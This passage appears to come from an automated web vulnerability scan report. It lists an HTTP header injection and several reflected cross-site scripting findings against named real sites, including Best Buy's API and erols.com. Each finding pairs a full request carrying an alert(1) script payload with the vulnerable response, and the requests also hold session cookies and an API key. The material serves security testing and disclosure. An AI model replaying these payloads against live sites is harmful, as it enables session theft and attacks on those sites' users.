Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /78e59%0d%0a406ba78a9fd/cm.bby.pcmcat203600050025/pcmcat203600050025;dcopt=ist;id=pcmcat203600050025;type=list;brand=;sku=;subzone1=undefined;subzone2=undefined;subzone3=undefined;subzone4=undefined;pos=top;tile=1;sz=728x90;ord=2881598161? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://images.bestbuy.com/BestBuy_US/en_US/images/global/admodel/fire.html?size=728x90&site=pcmcat203600050025&zone=pcmcat203600050025&id=pcmcat203600050025&type=list&subzone1=undefined&subzone1=undefined&subzone3=undefined&subzone4=undefined&tile=1
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/78e59
406ba78a9fd
/cm.bby.pcmcat203600050025/pcmcat203600050025;dcopt=ist;id=pcmcat203600050025;type=list;brand=;sku=;subzone1=undefined;subzone2=undefined;subzone3=undefined;subzone4=undefined;pos=top;tile=1;sz=728x90;ord=2881598161:
Date: Mon, 18 Jul 2011 12:59:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3. Cross-site scripting (reflected)
There are 198 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 68799<script>alert(1)</script>a288158a184 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v168799<script>alert(1)</script>a288158a184/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "9741fe2131014677912d443f74a248fe"
X-Runtime: 2
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Mon, 18 Jul 2011 13:00:19 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v168799<script>alert(1)</script>a288158a184/products(digitalSku>
...[SNIP]...

3.2. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e9d2b<script>alert(1)</script>67b415acb5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22e9d2b<script>alert(1)</script>67b415acb5b&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "4c75cf3cf3252688f340f0f4ea802c35"
X-Runtime: 2
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Mon, 18 Jul 2011 13:00:21 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v1/products(digitalSku>\"\"e9d2b<script>alert(1)</script>67b415acb5b&sku in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json'",
"status": "400 Bad Request"
}

...[SNIP]...

3.3. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 15b9d<script>alert(1)</script>ccb5f2f0c81 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC15b9d<script>alert(1)</script>ccb5f2f0c81&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "226ca56fdabe2e825c5d252ee6a45428"
X-Runtime: 27
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 405
Date: Mon, 18 Jul 2011 13:00:10 GMT

SDSTATIC15b9d<script>alert(1)</script>ccb5f2f0c81({
"queryTime": "0.006",
"currentPage": 1,
"totalPages": 0,
"partial": false,
"from": 1,
"total": 0,
"to": 0,
"products": [

],
"canonicalUrl": "/v1/products(digitalSku>
...[SNIP]...

3.4. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d7646<script>alert(1)</script>868fac7865c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json&d7646<script>alert(1)</script>868fac7865c=1 HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "6a55e83eb495dc72dbe3a94b0f38a975"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2393
Date: Mon, 18 Jul 2011 13:00:16 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
nderstand '/v1/products(digitalSku>\"\"&sku in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json&d7646<script>alert(1)</script>868fac7865c=1'",
"status": "400 Bad Request"
}
})

3.5. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [pageSize parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of the pageSize request parameter is copied into the HTML document as plain text between tags. The payload d6c6e<script>alert(1)</script>eeac2f6fc7c was submitted in the pageSize parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99d6c6e<script>alert(1)</script>eeac2f6fc7c&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "a8b3c56b89f2fc21f325c2ff8d8b0f10"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Mon, 18 Jul 2011 13:00:12 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
: "Couldn't understand '/v1/products(digitalSku>\"\"&sku in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99d6c6e<script>alert(1)</script>eeac2f6fc7c&format=json'",
"status": "400 Bad Request"
}
})

3.6. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [show parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of the show request parameter is copied into the HTML document as plain text between tags. The payload 1a141<script>alert(1)</script>c2cb467df93 was submitted in the show parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku1a141<script>alert(1)</script>c2cb467df93&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "ee7d295a422b247c30a90d8b7ae9e988"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Mon, 18 Jul 2011 13:00:07 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v1/products(digitalSku>\"\"&sku in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku1a141<script>alert(1)</script>c2cb467df93&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json'",
"status": "400 Bad Request"
}
})

3.7. http://cgibin.erols.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 57d8c<script>alert(1)</script>80cbe202f74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico57d8c<script>alert(1)</script>80cbe202f74 HTTP/1.1
Host: cgibin.erols.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 02:20:57 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html
Content-Length: 320

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico57d8c<script>alert(1)</script>80cbe202f74 was not found on this server.<P>
...[SNIP]...

3.8. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload af98e<script>alert(1)</script>44657fdf20a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziringaf98e<script>alert(1)</script>44657fdf20a/cgi-bin/nsgate/gate.pl HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:28 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /ziringaf98e<script>alert(1)</script>44657fdf20a/cgi-bin/nsgate/gate.pl was not found on this server.<P>
...[SNIP]...

3.9. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 36894<script>alert(1)</script>b3fd1e87874 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziring/cgi-bin36894<script>alert(1)</script>b3fd1e87874/nsgate/gate.pl HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:29 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /ziring/cgi-bin36894<script>alert(1)</script>b3fd1e87874/nsgate/gate.pl was not found on this server.<P>
...[SNIP]...

3.10. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f324a<script>alert(1)</script>edcfd067e35 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziring/cgi-bin/nsgatef324a<script>alert(1)</script>edcfd067e35/gate.pl HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:30 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /ziring/cgi-bin/nsgatef324a<script>alert(1)</script>edcfd067e35/gate.pl was not found on this server.<P>
...[SNIP]...

3.11. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8e515<script>alert(1)</script>5341abcd9af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziring/cgi-bin/nsgate/gate.pl8e515<script>alert(1)</script>5341abcd9af HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:33 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /ziring/cgi-bin/nsgate/gate.pl8e515<script>alert(1)</script>5341abcd9af was not found on this server.<P>
...[SNIP]...

3.12. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49c6f"><script>alert(1)</script>c05ff7c7c01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziring/cgi-bin/nsgate/gate.pl?49c6f"><script>alert(1)</script>c05ff7c7c01=1 HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 18 Jul 2011 02:16:12 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 3.2//EN">
<!-- Template top.phtml -->
<HTML>
<head>
<TITLE>Super DNS Lookup Gateway
</TITLE>
<META Name="author" Content="Neal Ziring">
<META Name="keyw
...[SNIP]...
<form method="get" action="/ziring/cgi-bin/nsgate/gate.pl?49c6f"><script>alert(1)</script>c05ff7c7c01=1" enctype="application/x-www-form-urlencoded">
